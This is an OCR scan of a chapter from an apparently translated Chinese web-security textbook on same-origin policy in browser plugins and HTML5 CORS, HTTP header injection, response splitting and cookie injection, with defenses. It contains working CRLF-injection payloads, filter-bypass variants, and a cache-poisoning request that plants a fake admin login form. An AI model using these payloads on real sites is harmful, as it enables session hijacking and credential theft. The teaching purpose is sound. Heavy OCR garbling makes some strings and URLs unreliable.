口 由 于 应 用 程序 可 以 使 用 xMLHttpRequest 检 索 动 态 脚 本 ， 因 此 它 也 可 以 使 用 PosT 请 求 完 
成 这 个 任务 。 如 果 应 用 程序 仅 接 受 使 用 posT 请 求 访问 可 能 易 受 攻击 的 脚本 代码 ， 它 就 能 
人 够 阻止 第 三 方 站 点 将 它们 包含 在 <script> 标 签 内 。 


13.3 同 源 策略 深 入 讨论 


在 本 草 和 前 一 草 中 , 我 们 介绍 了 如 何 将 同 源 策 略 应 用 于 HTML 和 JavaScript 的 大 量 示例 ,以 及 
利用 应 用 程序 漏洞 和 浏 归 带 怪 疾 突破 这 种 策略 的 各 种 方式 。 为 进一步 了 解 同 源 末 上 略 对 于 Web 应 用 
程序 安全 的 重要 性 , 我 们 将 在 这 一 市 中 介绍 其 他 一 些 适用 该 策略 的 情形 ,以 及 这 些 情形 如 何 会 导 
致 某 些 路 域 攻击 。 


13.3.1 同 源 策略 与 浏览 器 扩展 


各 种 广泛 部 署 的 浏览 希拉 展 技术 全 都 在 域 之 间 实 施 了 某 种 隔离 , 这 种 隔离 的 实施 方式 与 主要 
的 浏览 硕 同 源 寅 略 所 采用 的 基本 原则 相同 。 但 是 , 每 种 实施 方式 的 一 些 特 点 在 某 些 情况 下 可 能 会 
导致 跨 域 攻击 。 

1. 同 源 策略 与 Flash 

Flash 对 象 的 来 源 由 加 载 这 些 对 象 的 UREL 所 在 的 域 决定 , 而 不 是 由 加 载 这 些 对 象 的 HTML 页 面 
的 URL 决 定 。 和 浏览 瘟 中 的 同 源 策 略 一 样 , 默认 情况 下 , 将 基于 协议 、 主 机 名 和 病 口 号 实施 隔离 。 

除 与 同一 来 源 进 行 完 全 双 回 交互 外 ，Flash 对 象 还 可 以 通过 浏览 硕 使 用 URLRequest API 提 出 
路 域 请 求 。 与 纯粹 的 浏览 需 技 术 相 比 ， 以 这 种 方式 提出 请 求 可 以 对 请 求实 施 更 进一步 的 控制 ， 如 
能 够 指定 任意 的 Content-Type 消 息 头 及 在 PosT 请 求 主 体 中 发 送 任意 内 容 。 将 对 这 些 请 求 应 用 浏 
览 器 cookie， 但 默认 情况 下 ， 提 出 这 些 请 求 的 Flash 对 象 并 不 能 读 取 对 跨 源 请 求 做 出 的 响应 。 

Flash 提 供 了 一 种 机 制 ， 各 种 域 可 通过 这 种 机 制 癌 来 目 其 他 工 的 Flash 对 和 象 授予 权限 ， 以 便于 
这 些 对 象 与 它们 进行 完全 双 回 的 交互 。 通 和 总， 授予 权限 的 域 会 在 URL /crossdomain.xml 处 发 布 一 
个 策略 文件 ， 从 而 完成 这 一 任务 。 当 某 个 Flash 对 象 尝 试 提出 双向 跨 域 请 求 时 ，Flash 浏 览 姻 扩展 
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将 检索 所 请 求 的 域 中 的 策略 文件 , 并 仅 在 所 请 求 的 域 授权 对 提出 请 求 的 域 的 访问 权限 时 , 才 人 允许 
上 述 请 求 。 
由 www.adobe.com 发 布 的 Flash 策 略 文件 如 下 所 示 : 


<? 了 Xml version="1.0"?> 

<cCross-domain-policy> 
<Site-control permitted-cross-domain-policies="by-content-type'"/> 
<allow-access-from domain="*.macromedia.com" /> 
<allow-access-from domain="*.adobe.com" /> 
<allow-access-from domain="*.photoshop.com" /> 
<allow-access-from domain="*.acrobat.com'" /> 


</cross-domain-policy> 


渗透 秀 测试 步 





ee 始终 检查 所 测试 的 任何 Web 应 用 程序 中 的 /crossdomain.xml 文 件 。 即使 应 用 程序 本 
二 不 使 用 Flash， 但 如 果 问 男 一 个 域 授予 权限 ， 则 由 该 域 发 布 的 Flash 对 和 象 将 可 以 与 发 布 策略 的 
域 进行 交互 。 
口 如 果 应 用 程序 允许 无 限制 访问 (通过 指定 <allow-access-from domain="*' 本 
则 任何 其 他 站 点 均 可 以 执行 双 癌 交互 ， 从 而 控制 应 用 程序 用 户 的 会 话 。 这 样 ， 其 他 域 
就 可 以 检索 全 部 数据 ， 0 ellis 

口 如 果 应 用 程序 可 以 访问 同一 组 织 使 用 的 子 域 或 其 他 域 ， 则 这 些 域 当然 可 以 与 应 用 程序 
进行 双 问 交互 ,这 意味 者， 以 利用 这 些 域 上 的 XSS 等 漏洞 来 攻破 授予 权限 的 域 。 
此 外 ， 如 果 攻 击 者 能 够 在 任何 域 上 购买 基于 Flash 的 广告 ， 就 可 以 使 用 其 部 署 的 Flash 对 
象 来 攻破 授予 权限 的 域 。 

口 一 些 策略 文件 会 披露 内 联网 主机 名 或 其 他 可 能 对 攻击 者 有 用 的 敏感 信息 。 




















此 外 , 知 要 注意 的 是 ,Flash 对 象 可 能 会 在 应 从 中 下 载 束 略 文 件 的 目标 服务 右上 指定 一 个 URL。 
如 果 黑 认 位 置 没 有 顶级 策略 文件 , Flash 浏 览 硕 会 答 试 从 该 指定 的 URL 处 下 载 策 略 文件 。 对 此 URL 
的 啊 应 必须 包含 格式 有 效 的 策略 文件 , 并 必须 在 content-Type 消 息 头 中 指定 一 种 XML 或 基于 文 
本 的 MIME 类 型 ,才能 得 到 处 理 。 当前 ,网 络 上 的 大 多 数 域 都 没有 在 /crossdomain.xml 位 置 发 布 Flash 
策略 文件 ， 这 可 能 基于 以 下 假设 : 在 没有 策略 的 情况 下 ， 菊 认 行 为 是 禁止 任何 览 域 访问 。 但 是 ， 
这 一 假设 忽略 了 第 三 方 Flash 对 和 象 指 定 用 于 下 载 束 上 略 的 定制 URL 的 可 能 性 ,如 果 应 用 程序 包含 任何 
功能 ， 可 被 攻击 者 用 于 在 应 用 程序 域 上 的 URL 中 插入 任意 XML 文 件 ， 则 该 应 用 程序 可 能 就 易于 
受到 这 种 攻击 。 

2. 同 源 策略 与 Silverlight 

用 于 Silverlight 的 同 源 策 略 在 很 大 程度 上 基于 由 Flash 实 施 的 策略 。Silverlight 对 象 的 来 源 由 加 
载 这 些 对 象 的 URL 所 在 的 域 决 定 ， 而 不 是 由 加 载 这 些 对 象 的 HIML 页 面 的 URL 决 定 。 

Silverlight 与 Flash 的 一 个 重要 区 别 在 于 ，Silverlight 不 会 基于 协议 或 端口 隔离 来 源 ， 因 此 通过 
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HTTP 加 载 的 对 和 象 可 以 与 同一 域 上 的 HTTPS URL 区 互 。 
Silverlight 使 用 自己 的 跨 域 策略 文件 ， 地 址 为 /clientaccesspolicy.xml。 由 www.microsoft.com 发 
布 的 Silverlight 策 略 文件 如 下 所 示 : 


<?Xxml version="1.0" encoding="utf-8"?> 
<access—policy> 
<Cross-domain-access> 
<policy> 
<allow-from > 
<domain uri="http://www.microsoft.com"/> 
<domain uri="http://i.microsoft.com"/> 
<domain uri="http://i2.microsoft.com"/> 
<domain uri="http://i3.microsoft.com"/> 
<domain uri="http://i4.microsoft.com"/> 
<domain uri="http://img.microsoft.com’"/> 
</allow-from> 
<grant to> 
<resource path="/" include-subpaths="true"/> 
</grant-to> 
</policy> 
</cCross-domain-access> 


</access-policy> 

上 上面 介 绍 的 针对 Flash 跨 域 策略 文件 的 注意 事项 同样 适用 于 Silverlight， 但 是 ，Silverlight 不 允 
许 对 象 为 策略 文件 指 定 非 标准 的 URL。 

如 果 服 务 器 上 没有 Silverlight 策 略 文件 ，Silverlight 浏 览 器 扩展 会 尝试 从 默认 位 置 加 载 有 效 的 
Flash 策 略 文件 。 不 过 ， 如 采 存 在 策略 文件 ， 则 扩展 会 处 理 该 文件 。 

3. 同 源 策略 与 Java 

Java 在 来 源 之 间 实 施 隅 离 ， 它 实施 隅 离 的 方式 在 很 大 程度 上 基于 浏览 可 的 同 源 胰 略 。 和 其 他 
浏览 妖 扩 展 一 样 ，Java applet 对 象 的 来 源 由 加 载 这 些 对 象 的 UREL 所 在 的 域 决 定 ， 而 不 是 由 加 载 这 
些 对 象 的 HTML 页 面 的 URL 决 定 。 

Java 同 源 策 略 的 一 个 重要 不 ue 于 : 某 些 情况 下 , 与 来 源 域 共享 了 下 地 址 的 其 他 域 将 被 视 为 “ 同 
源 ”"。 在 某 些 共享 主机 的 情况 下 ， 这 可 能 会 导致 一 定 程 度 的 路 域 交 互 。 

当前 ，Java 并 不 限制 一 个 域 发 布 允 许 与 其 他 域 进行 交互 的 琳 略 。 























13.3.2 同 源 策略 与 HTML5 


按照 最 初 的 设计 ， XMLHttpRequest 仅 允许 向 与 调用 页 面 的 来 源 相同 的 来 源 提出 请 求 。 随 着 
HTML5 的 出 现 ， 这 一 技术 已 得 以 修改 ， 从 而 可 以 与 其 他 域 进行 双向 交互 ， 前 提 是 被 访问 的 域 为 
交互 提供 权限 。 

跨 域 交互 的 权限 通过 一 系列 新 的 HTTP 消 奶 尖 来 实现 。 如 采 某 个 脚本 尝试 使 用 XMLHttp- 
Request 提 出 跨 域 请 求 ， 人 处理 该 请 求 的 方式 将 因 请 求 的 具体 内 容 而 异 。 
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口 对 于 “常规 ”请 求 ， 即 可 以 使 用 现 有 的 HTML 结构 跨 域 生 成 的 请 求 ， 浏 览 器 将 提出 请 求 ， 
并 检查 生成 的 啊 应 消息 头 ， 以 确定 是 否 应 允许 调用 脚本 访问 该 请 求 的 啊 应 。 
口 其 他 无 法 使 用 现 有 的 HTML 生成 的 请 求 , 如 那些 使 用 非 标准 HTTP 方 法 或 Content-Type、 
或 添加 了 定制 HTTP 消 息 头 的 请 求 ， 将 进行 不 同 处 理 。 浏 览 姨 会 首先 癌 目 标 URL 提 出 一 个 
OPTIONS 请 求 ， 然 后 检查 啊 应 消息 头 ， 以 确定 是 否 应 允许 那些 请 求 。 
在 上 述 两 种 情况 下 , 浏览 圳 都 会 添加 一 个 origin 消 息 头 ,用 于 指示 尝试 提出 跨 域 请 求 的 域 。 
Origin: ELEEDS7 Wansaooveceom 
要 确定 可 能 执行 双 癌 交互 的 域 ， 服 务 右 的 啊 应 中 应 包含 Access-Control-Allow-Origin 
消息 头 ， 其 中 包括 以 逗号 分 隔 的 允许 的 域 列 表 和 通配符 : 
es one RTioy eo 
在 第 二 种 情况 下 , 如 果 已 使 用 oPTIONS 请 求 预先 验证 了 路 域 请 求 , 则 可 以 使 用 以 下 消息 头 来 
指示 尝试 提出 的 请 求 的 具体 内 容 : 


ACcCess-Control-Regquest-Method: PUT 
ACcCess-Control-Regquest-Headers: X-PINGOTHER 


为 啊 应 OPTIONS 请 求 ， 服 务 需 可 以 使 用 以 下 消息 头 来 指定 允许 提出 的 路 域 请 求 的 类 型 : 
AcCcess-Control-Allow-Origin: http://wahh-app.com 
AccCcess-Control-Allow-Methods: POST, GET, OPTIONS 


Access-Control-Allow-Headers: X-PINGOTHER 
ACCesSss-Control-Max-Age: 1728000 









































渗透 测试 步 又 








(1) 要 测试 应 用 程序 如 何 使 用 xMLHttpRequest 人 处 理 跨 域 请 求 ， 测 试 员 应 尝试 添加 一 个 用 
于 指定 其 他 域 的 origin 消 息 头 ， 并 检查 返回 的 任何 Access-Ccontrol 消 息 头 。 人 允许 任何 域 或 
指定 的 其 他 域 进 行 双 同 访问 导致 的 安全 隐患 与 上 述 Flash 器 域 条 上 略 导 人 致 的 安全 隐患 相同 。 

(2) 如 果 有 任何 跨 域 访 问 受 到 支持 ， 则 测试 员 还 应 使 用 opPTIONS 请 求 来 了 解 到 底 允 许 哪些 
消息 头 和 其 他 请 求 。 








除 可 能 允许 儿 部 域 进行 双 问 交互 上 ， XMLHttpRequest 的 新 特性 还 可 能 导致 利 用 Web 应 用 程 
序 的 特定 功能 的 新 型 攻击 ， 或 新 型 常规 攻击 。 

如 第 12 草 所 述 , 一 些 应 用 程序 使 用 xMLHt tpRequest 癌 在 URL 参 数 中 、 或 在 片断 标识 符 后 指 
定 的 文件 提出 异步 请 求 。 检 索 到 的 文件 动态 加 载 到 当前 页 面 的 <daiv> 中 。 由 于 以 前 不 可 能 使 用 
XMLHttpRequest 提 出 监 域 请 求 ， 因 此 也 没有 必要 验证 所 请 求 的 项 目 是 否 在 应 用 程序 自 喘 的 域 
上 。 利 用 新 版 本 的 XMLHttpRequest, 攻击 者 可 以 在 其 控制 的 域 上 指定 一 个 URL， 从 而 对 应 用 程 
序 用 户 实 施 客户 问 远 程 文件 包含 攻击 。 

更 常见 的 是 攻击 者 可 以 借助 xMLHttpRequest 的 新 特性 , 利用 恶意 或 被 攻破 的 网 站 ,通过 访 
问 网 站 用 户 的 浏览 旨 来 实施 攻击 ， 即 使 这 时 监 域 访问 已 遭 到 禁止 。 跨 域 端口 扫描 表明 ， 使 用 























388 第 13 章 攻击 用 户 : 其 他 技巧 


XMLHttpRequest 党 试 条 任 意 主 机 和 端口 提出 请 求 ,并 观察 啊 应 的 时 间 差 异 , 可 以 推断 所 请 求 的 
端口 是 否 已 打开 、 关 闭 或 被 过 滤 。 此 外 ， 与 传统 的 生成 跨 域 请 求 的 方法 相 比 ， 使 用 
XMLHttpRequest 可 以 更 快速 地 实施 分 布 式 拒绝 服务 攻击 。 如 果 目 标 应 用 程序 禁止 跨 域 访问 ， 则 
需要 在 URL 参 数 中 增加 一 个 值 ， 以 确保 每 个 请 求 针 对 不 同 的 URL， 因 此 实际 上 由 浏览 絮 提 出 。 


13.3.3 ”通过 代理 服务 应 用 程序 跨 域 


一 些 公 开发 布 的 Web 应 用 程序 提供 高 效 的 代理 服务 功能 ， 人 允许 从 不 同 域 检索 内 容 ,但 服务 于 
代理 Web 应 用 程序 中 的 用 户 。Google 翻 详 (GT ) 就 是 一 个 典型 的 例子 ， 它 可 以 请 求 指定 的 外 部 
URL 并 返回 其 内 容 ， 如 图 13-2 所 示 。( 虽然 翻 详 引擎 可 能 会 修改 检索 到 的 啊 应 中 的 文本 ， 但 基本 
的 HIML 标 记 和 任何 脚本 代码 仍 保持 不 变 。) 


ee 3 a a 
¢ OEE ttp://translate,google,.com/tra |=en&sl=aut SN 


EEC 
oo translate http://portswigger.net/ View: @ Translatior © Oridina 
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图 13-2 Google 翻译 可 请 求 外 部 URL， 并 返回 其 内 容 ， 啊 应 中 的 文本 将 被 翻译 成 指定 的 语言 


如 果 两 个 不 同 的 外 部 域 均 通过 GT 应 用 程序 访问 ， 这 时 可 能 会 一 个 有 趣 的 问题 。 这 种 情况 下 ， 
在 浏览 器 看 来 ， 来自 每 个 外 部 域 的 内 容 将 驻 留 在 GT 域 中 ， 因 为 这 是 浏览 器 从 中 检索 内 容 的 域 。 
虽然 两 组 内 容 均 驻 留 在 同一 个 域 中 ， 它 们 之 间 可 以 进行 双向 交互 (如 果 这 种 交互 也 通过 GT 域 实 
施 的 话 )。 

当然 ， 如 果 用 户 登 录 某 个 外 部 应 用 程序 ， 然 后 通过 GT 访问 该 应 用 程序 ， 则 该 用 户 的 浏览 用 
会 正确 地 将 GT 视 为 其 他 域 。 因 此 , 用户 用 于 外 部 应 用 程序 的 cookie 将 不 会 通过 GT 在 请 求 中 发 送 ， 
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并 且 也 不 可 能 进行 任何 其 他 交互 。 同 样 ， 恶 意 网 站 也 无 法 利用 GT 轻松 攻破 其 他 应 用 程序 上 的 用 
户 会 话 。 

但 是 ， 网 站 可 以 利用 GT 等 代理 服务 行为 与 位 于 其 他 域 上 的 应 用 程序 的 公开 、 未 授权 的 区 域 
进行 双向 交互 。Jikto 就 是 这 样 的 一 种 攻击 。Jikto 是 一 个 概念 验证 蠕虫 ， 通 过 在 Web 应 用 程序 中 查 
找 并 利用 永久 性 XSS 漏 洞 ， 从 而 在 应 用 程序 之 间 进 行 传播 。Jikto 代 码 的 基本 运行 机 制 如 下 。 

口 初次 运行 时 ， 该 脚本 会 检查 其 是 否 在 GT 域 中 运行 。 如 果 不 是 ， 它 会 通过 GT 域 加 载 当前 

URL， 从 而 将 自己 传送 到 GT 域 中 。 

口 该 脚本 通过 GT 请 求 外 部 域 中 的 内 容 。 由 于 该 脚本 自身 在 GT 域 中 运行 ， 它 可 以 通过 GT 与 

任何 其 他 域 上 的 公开 内 容 进 行 双 问 交互 。 

口 该 脚本 以 JavaScript 实 现 一 个 基本 的 Web 扫 擂 程 序 , 在 外 部 域 中 探查 永久 性 XSS 漏 洞 。 公 告 

牌 等 可 以 公开 访问 的 功能 中 可 能 存在 这 类 漏洞 。 

口 确定 适当 的 漏洞 后 ， 该 脚本 将 利用 此 漏洞 将 它 的 一 个 副本 加 载 到 外 部 域 中 。 

口 其 他 用 户 访问 被 攻破 的 外 部 域 时 ， 该 脚本 开始 执行 ， 并 且 这 个 过 程 会 不 断 自 动 重复 。 

Jikto 蠕 虫 会 设法 利用 XSS 漏 洞 来 传播 自己 。 但 是 ， 这 种 通过 代理 服务 合并 域 的 基本 攻击 技巧 
并 不 取决 于 所 针对 的 单个 外 部 应 用 程序 中 的 任何 漏洞 ,也 无 法 进行 有 效 防 御 。 此 外 ， 它 还 是 一 种 
有 用 的 攻击 技巧 。 测 试 员 也 可 以 通过 它 来 了 解 如 何在 非常 规 情 况 下 应 用 同 源 策略 。 


13.4 ”其 他 客 尸 端 注 入 攻击 
到 现在 为 止 ,我们 介绍 的 许多 攻击 主要 与 利用 某 种 应 用 程序 功能 向 应 用 程序 响应 中 注入 专门 


设计 的 内 容 有 关 。 这 其 中 最 主要 的 攻击 为 XSS 攻 击 。 我 们 还 介绍 了 通过 注入 的 HTML 和 CSS 代 码 
跨 域 捕获 数据 的 技巧 。 在 这 一 节 中 ， 我 们 将 介绍 其 他 一 些 客 户 端 注 入 攻击 。 









































13.4.1 HTTP 消 息 头 注入 





如 采用 户 控制 的 数据 以 不 安全 的 方式 插入 到 应 用 程序 返回 的 HTTP 消 恩 尖 中 ， 这 时 就 会 出 现 
HTTP 消 息 头 注入 漏洞 。 如 末 攻 击 者 能 够 在 他 控制 的 消息 头 中 注入 换行 符 ， 他 就 能 在 啊 应 中 插入 
其 他 HTTP 消 息 头 、 并 在 啊 应 主体 中 写 和 人 任意 内 容 。 

这 种 漏洞 最 常见 于 Location 与 Set-Ccookie 消 息 状 中， 但 也 会 出 现在 其 他 HTTP 消 息 头 中 。 
前 文 已 经 讲 到 , 应 用 程序 提取 用 户 提交 的 输入 ,并 将 它 插入 到 啊 应 码 为 3xx 的 Location 消 息 头 中 。 
同样 ， 一 些 应 用 程序 提取 用 户 提 交 的 输入 ， 并 将 其 插入 cookie 什 中。 例如: 


GET /settings/12/Default.aspx?Language=English HTTP/1.1 
Host: mdsec.net 



































HTTP/1i.1i 200 OK 


Set-Cookie: PreferredLanguage=English 


在 上 述 任何 一 种 情况 下 ， 攻 击 者 都 可 以 使 用 回 车 符 〈0x0d ) 或 换行 符 ( 0x0a ) 构造 一 个 专门 


390 第 13 章 攻击 用 户 : 其 他 技巧 











设计 的 请 求 ， 在 他 们 控制 的 消息 头 中 注入 一 个 换行 待 ， 从 而 在 下 面 的 行 中 注入 其 他 数据 。 例 如 
GET /settings/12/Default.aspx?Language=English%0d%S0aFoo:+bar HTTP/1.1 


Host: mdsec.net 


HTTP/1.1 200 OK 
Set-Cookie: PreferredLanguage=English 


Foo: bar 


1. 利用 消息 头 注入 漏洞 

查找 消息 头 注 入 着 洞 的 方法 与 查找 XSS 源 洞 的 方法 类 似 , 同样 需要 寻找 用 户 控 制 的 输入 重复 
出 现在 应 用 程序 返回 的 HTTP 消息 头 中 的 情况 。 因 此 ， 在 探查 应 用 程序 是 否 存在 XSS 漏 洞 的 过 程 
中 ， 还 应 当 确 定 应 用 程序 可 能 易于 受到 消息 头 注入 的 全 部 位 置 。 









































渗透 测试 步 双 


0) 在 用 户 控制 的 输入 被 复制 到 HTTP 消 息 头 中 的 每 个 位 置 都 可 能 存在 漏洞 ,确认 应 用 程序 





是 人 否 接受 URL 编 码 的 回 车 人 特 (%04 ) 与 换行 行 (%0a )， 以 及 它们 是 否 按 原 样 在 啊 应 中 返回 。 
(2) 注意 ， 是 在 服务 做 的 啊 应 中 而 不 是 换行 符 的 URL 编 码 形 式 中 寻找 换行 符 本 号 。 如 有 打通 
过 拦 蕉 代理 服务 郁 查 看 啊 应 ， 攻 击 成 功 的 话 ， 应 该 会 在 HITP 消 息 头 中 看 到 万 外 一 个 新 行 。 
(3) 如 末 服 务 角 的 啊 应 中 仅 返 回 两 个 换行 符 中 的 一 个 ， 根 据 实际 情况 ， 仍 然 能 够 设计 出 有 
效 的 攻击 方法 。 
(4) 如 果 发 现 换 行 答 被 应 用 程序 阻止 或 浪人 化， 那么 应 该 尝试 以 下 攻击 方法 : 
foo%00%0d%0abar 


foo%250d%250abar 
foo%%0d0d%%0a0abar 








有 时 ， 由 于 过 分 依赖 HTML 源 代码 或 浏览 器 插件 提供 的 信息 (其 中 并 不 显示 响 
消息 头 ), 上 述 问题 可 能 会 被 忽略 。 因 此 , 应 确保 使 用 拦截 代理 服务 器 工具 读 取 HTTP 


响应 消息 头 。 











如 采 能 够 在 啊 应 中 注入 任意 消息 头 和 消息 主体 内 容 , 那么 这 种 行为 可 通过 各 种 方式 攻击 应 用 
程序 的 其 他 用 户 。 


尝试 访问 
http://mdsec.net/settings/12/ 
http://mdsec.net/settings/31/ 
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@ || |] cookie 
攻击 者 可 以 建立 一 个 URL， 在 请 求 它 的 任何 用 户 的 浏览 硕 中 设 定 任意 cooike。 例 如 : 


GET /settings/12/Default.aspx?Language=English%0d%0aSset-— 
Cookie:+SessId%S3d120al2f98e8; HTTP/1.1 
Host: mdsec.net 





HTTP/1.1] 200 OK 
Set—-Cookie: PreferredLanguage=English 
Set-Cookie: SessId=120al2f98e8; 





如 果 进 行 适当 配置 , 这 些 cookie 可 以 访问 不 同 的 浏览 器 会 话 。 这 时 , 通过 前 面 利 用 反射 型 XSS 
漏洞 时 使 用 的 相同 传送 机 制 ( 电子 邮件 、 第 三 方 Web 站 点 等 ), 就 可 以 诱 使 目标 用 户 访问 恶意 URL 

eUUU000 

因为 HTTP 消 息 头 注入 允许 攻击 者 控制 整个 啊 应 主体 ， 所 以 几乎 任何 针对 其 他 用 户 的 攻击 都 
可 以 使 用 它 作为 传送 机 制 ， 包 括 虚 拟 Web 站 点 置换 、 脚 本 注入 、 任 意 重 定向 、 针 对 ActiveX 控 件 
的 攻击 等 。 

e@ HTTPI 0] 0 

这 是 一 种 试图 通过 恶意 内 容 “ 毒 害 ” 代 理 服 务 需 缓存 ， 从 而 攻破 通过 代理 服务 需 访 问 应 用 程 
序 的 其 他 用 户 的 攻击 技巧 。 例 如 ,如果 企 业 网 络 中 的 所 有 用 户 通过 缓存 代 理 服 务 天 访问 某 个 应 用 
程序 ， 那 么 ， 通 过 在 代理 服务 器 的 缓存 中 注入 恶意 内 容 ( 显示 给 任何 请 求 受 影响 页 面 的 用 户 )， 
攻击 者 就 可 以 癌 这 些 用 户 实施 攻击 。 

攻击 者 可 以 按 以 下 步 又 ， 利 用 消息 头 注 入 漏洞 来 实施 啊 应 分 割 攻击 : 

(1) 攻击 者 在 代理 服务 器 缓存 中 选择 一 个 他 和 希望 “毒害 ”的 应 用 程序 页 面 。 例 如 ， 他 可 能 会 
用 一 个 木马 登录 表单 〈 用 于 回 攻 击 者 的 服务 需 :提交 用 户 证 书 ) 代替 /admin/ 处 的 页 面 。 

(2) 攻击 者 确定 某 个 消息 头 注入 漏洞 ， 构 造 一 个 请 求 , 在 服务 器 响应 中 注入 一 个 完整 的 HTTP 
主体 以 及 另 一 组 啊 应 消息 头 和 另 一 个 啊 应 主体 。 ee 
HTML 源 代码 。 这 样 ， 服 务 硕 的 啊 应 看 起 来 就 像 是 两 个 连接 在 一 起 的 单独 HTTP 啊 应 。 因 此 ， 

种 技巧 叫做 HTTP 啊 应 分 割 (HTTP response splitting )， 因 为 攻击 者 已 经 把 服务 带 的 啊 应 “3 下 
成 两 个 单独 的 啊 应 。 例 如 : 


GET /settings/12/Default .aspx?Language=English%0d%0aContent-Length:+22 
SO0d%0ags0ds0a<html>%0d%s0afoo%O0d%s0a</html>%0d%0aHTTP/1 .1+200+OK%0d%0a 
Content-Length:+2307%0d%0a%0d%s0a<html>%0d%s0a<head>%0d%s0a<title> 
Administrator+login</title>0d%0al[...long URL...] HTTP/1.1 



































Host: mdsec.net 


HTTP/1.1 200 OK 
Set-Cookie: PreferredLanguage=English 
Content-Length: 22 


<html> 
foo 
</html> 
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HTTP/1.1 200 OK 
Content-Length: 2307 


<html> 
<head> 


<title>Administrator login</title> 


(3) 攻击 者 与 代理 服务 器 建 六 TCP 连接， 传送 这 个 专门 设计 的 请 求 ， 后 面 紧 跟着 访问 被 “ 毒 
韦 ” 的 页 面 的 请 求 。 在 HITP 协 议 中 ， 以 这 种 方式 连接 请 求 是 合法 的 。 

GET http://mdsec.net/settings/12/Default .aspx?Language=English%0d$%0a 

Content-Length:+22%0d%0a%Sod%0a<html>%S0d%0O0afoo%Od%$S0a</html>%0d%0aHHTTP/ 


1.1+200+OK%S0d%0aCcontent-Length:+2307%0d%0a%s0ds0a<htmil>%0d%s0a<head>%0d$s0a 
<title>Administratort+login</title>0d%0al[l...long URL...] HTTP/1.1 





. 








Host: mdsec.net 
Proxy-Connection: Keep-alive 


GET http://mdsec.net/admin/ HTTP/1.1 
Host: mdsec.net 


Proxy-Connection: Close 

(4) 代理 服务 融 与 应 用 程序 建立 TCP 连 接 ， 送 出 这 两 个 以 相同 方式 连接 的 请 求 。 

(5) 应 用 程序 用 攻击 者 注入 的 HTTP 内 容 啊 应 第 一 个 请 求 ， 它 看 起 来 就 像 是 两 个 单独 的 HTTP 
I 。 

(6) 代理 服务 硕 收 到 这 两 个 看 似 单 独 的 啊 应 ， 并 认为 其 中 第 二 个 啊 应 与 攻击 者 的 第 二 个 请 求 
相对 应 ， 该 请 求 指 问 URL: http:/mdsec.netadmin/。 代 理 服 务 需 把 第 二 个 啊 应 作为 这 个 URE 的 内 
容 保存 在 缓存 中 。( 如 条 代理 服务 天 已 经 在 缓存 中 保存 有 该 页 面 的 副本 ， 那 么 攻击 者 就 可 以 在 他 
的 第 二 个 请 求 中 插入 一 个 适当 的 If-Modified-since 消 息 涉 ， 并 在 注入 的 啊 应 中 插入 一 个 
Last-Modified 消 息 头 ， 使 得 代理 服务 需 重 新 请 求 这 个 URL， 用 新 的 内 容 更 新 它 的 缓存。) 

(7) 应 用 程序 发 布 它 对 攻击 者 的 第 二 个 请 求 的 啊 应 , 其 中 包含 URL http:/mdsec.netadmin/ 的 真 
实 内 容 。 代 理 服 务 硕 并 不 认为 它 是 对 它 发 布 的 请 求 的 啊 应 ， 因 而 抛弃 这 个 啊 应 。 

(8) 一 名 用 户 通 过 代理 服务 融 访问 http:/mdsec.netyadmin/, 并 收 到 这 个 URL 保 存在 代理 服务 硕 
绥 存 中 的 内 容 。 这 个 内 容 实 际 上 是 攻击 者 的 木马 登录 表单 ， 因 此 用 户 的 证 书 被 攻破 。 

实施 这 种 攻击 的 步 又 如 图 13-3 所 示 。 
































GET/home.php?uid=123 





hs 
请 求 1 %0d%0aContent-Length... 
请 求 1 的 响应 


被 忽略 HTTP/1.1 OK 请 求 2 的 啊 应 


图 13-3 ”用 于 毒害 代理 服务 郁 缓 存 的 HITP 啊 应 分 割 攻 击 涉及 的 步 又 
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2. 防止 消息 头 注入 漏洞 
要 防止 HTTP 消 息 头 注入 漏洞 ， 最 有 效 方法 是 杜绝 将 用 户 控制 的 输入 插 人 到 应 用 程序 返回 的 
HTTP 消 息 头 中 。 如 我 们 在 介绍 任意 重 定 向 漏洞 时 所 述 ， 通 常 可 以 用 一 些 较为 安全 的 方法 代 奉 这 
种 行为 。 
如 果 不 可 避免 地 要 在 HITP 消 息 头 中 搬 和 人 用 户 控制 的 数据 ， 那 么 应 用 程序 应 采取 以 下 双重 深 
层 防 御 方 法 防止 漏洞 产生 。 
口 输入 确认 。 应 用 程序 应 根据 情形 ， 对 插入 的 数据 进行 尽 可 能 严格 的 确认 。 例 如 ， 如 果 根 
据 用 户 输 入 设 定 一 个 cookie 值 ， 那 么 应 将 这 个 值 限制 为 仪 包含 字母 字符 ， 最 大 长 度 为 6 
字 节 。 



































口 输出 确认 。 应 对 插入 到 消息 头 中 的 所 有 数据 进行 过 滤 ， 检 测 可 能 的 恶意 字符 。 实 际 上 ， 
任何 ASCII 码 小 于 0x20 的 字符 都 应 被 视 为 可 疑 的 恶意 字符 , 应 用 程序 应 拒绝 包含 这 些 字符 


的 请 求 。 
只 有 应 用 程序 在 其 SSL 终 止 符 后 未 使 用 缓存 反 辐 代理 服务 希 ， 它 才能 通过 对 所 有 应 用 程序 内 
容 使 用 HTTPS， 防 止 攻击 者 利用 任何 残留 的 消息 头 注 入 漏洞 “毒害 ”代理 服务 俘 绥 存 。 

















13.4.2 ”cookie 注 入 


在 cookie 攻 击 中 ， 攻 击 者 利用 应 用 程序 功能 或 浏览 絮 行 为 的 某 种 特性 ， 在 受害 用 户 的 浏览 带 
中 设置 cookie， 或 修改 该 cookie。 

攻击 者 可 以 通过 各 种 方式 实施 cookie 注 入 攻击 。 

口 某 些 应 用 程序 的 功能 在 请 求 参 数 中 使 用 一 个 名 称 和 值 , 并 在 啊 应 的 cookie 中 设置 该 名 称 和 
值 。 保 存 用 户 首 选项 大 多 属于 此 类 功能 

口 如 前 所 述 ， 如 果 存 在 HTTP 消 息 头 注入 漏洞 ， 就 可 以 利用 此 漏洞 注入 任意 set-cookie 消 
县 头 。 

口 可 以 利用 相关 域 中 的 XSS 漏 洞 在 目标 域 上 设置 一 个 cookie。 目 标 域 的 任何 子 域 ， 以 及 目标 
域 的 父 域 及 其 子 域 ， 都 可 以 通过 这 种 方式 加 以 利用 。 

口 可 以 利用 主动 中 间 人 攻击 〈 例 如 ， 针 对 公共 无 线 网 络 中 的 用 户 ) 在 任意 域 上 设置 cookie， 
即使 目标 应 用 程序 仅 使 用 HTTPS 并 且 将 其 cookie 标 记 为 安全 。 我们 将 在 本 章 后 面部 分 详细 
介绍 这 种 攻击 。 

